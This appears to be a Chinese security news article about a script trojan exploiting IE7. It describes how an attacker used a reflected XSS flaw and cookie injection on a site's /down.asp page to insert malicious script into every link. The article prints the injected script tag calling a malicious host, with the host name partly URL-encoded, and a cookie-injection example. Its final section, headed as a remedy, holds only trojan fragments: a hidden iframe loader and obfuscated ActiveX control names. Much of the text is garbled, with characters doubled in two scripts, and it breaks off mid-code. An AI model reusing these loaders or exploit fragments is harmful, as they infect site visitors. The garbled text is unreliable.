近日，一款利用IE7漏洞進(jìn)行傳播的腳本木馬在網(wǎng)上迅速傳播，該木馬利用搜索引擎檢索站點(diǎn)漏洞，并進(jìn)行自動(dòng)傳播。幾天內(nèi)，數(shù)萬(wàn)站點(diǎn)遭受感染，其中hongxiu.com、msn中國(guó)、東方財(cái)經(jīng)網(wǎng)等都被入侵。

發(fā)現(xiàn)惡意軟件

某日早上，某網(wǎng)站維護(hù)人員小任像往常一樣打開(kāi)了網(wǎng)站首頁(yè)，隨手點(diǎn)擊了一個(gè)鏈接，想驗(yàn)證一下網(wǎng)站是否可以正常訪問(wèn)，沒(méi)想到居然觸發(fā)了防病毒的軟件的報(bào)警：“發(fā)現(xiàn)惡意軟件”。心細(xì)的小任在一查之下大吃了一驚：首頁(yè)的幾乎所有鏈接都被加上了一個(gè)奇怪的網(wǎng)址“hxxp://c.nuclear3.com/css/c.js”，而這個(gè)js腳本，就是觸發(fā)防病毒軟件報(bào)警的元兇。

無(wú)奈之下，小任想到了自己?jiǎn)挝坏木W(wǎng)絡(luò)安全設(shè)備提供商啟明星辰公司，并立刻聯(lián)系上該公司駐當(dāng)?shù)厝藛T，同時(shí)一并提供的還有網(wǎng)站的日志文件。

攻擊者的手法

很快，小任就得到了啟明星辰工程師的反饋信息，在網(wǎng)站的/down.asp頁(yè)面下，存在一個(gè)反射式的XSS漏洞，駭客就是利用這個(gè)漏洞，通過(guò)cookie 注入的方式，將惡意腳本

{Script Src=http://c.nu%63%6Cear3.com/css/c.js}{/script}

注入到每一個(gè)網(wǎng)站鏈接中，以達(dá)到危害用戶的目的。

小知識(shí)：什么叫反射式XSS

Web客戶端使用Server端腳本生成頁(yè)面為用戶提供數(shù)據(jù)時(shí)，如果未經(jīng)驗(yàn)證的用戶數(shù)據(jù)被包含在頁(yè)面中而未經(jīng)HTML實(shí)體編碼，客戶端代碼便能夠注入到動(dòng)態(tài)頁(yè)面中。

在這個(gè)例子里，駭客將惡意腳本嵌入U(xiǎn)RL，網(wǎng)站訪問(wèn)者一旦點(diǎn)擊這個(gè)鏈接，瀏覽器將認(rèn)為惡意代碼是來(lái)自網(wǎng)站，從而“放心”的執(zhí)行。

小知識(shí)：cookie注入

Cookie注入是SQL注入攻擊的一種表現(xiàn)形式，是系統(tǒng)直接使用"request("name")"獲取客戶提交的數(shù)據(jù),并對(duì)客戶提交的變量沒(méi)有過(guò)濾,而且在防注入程序中沒(méi)有限制Request.cookie所導(dǎo)致的。

一個(gè)典型的例子就是

javascript:alert(document.cookie="id="+escape(XX and "attack string")

斬?cái)嘧⑷牒谑?/STRONG>

document.write("{iframe src='http://fvgit.cn/01/index.htm' width='100' height='0'}{/iframe}");

var ll=new ActiveXObject("snpv"+"w.Snap"+"shot View"+"er Cont"+"rol.1");}
rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "ERP" + "Ctl.1";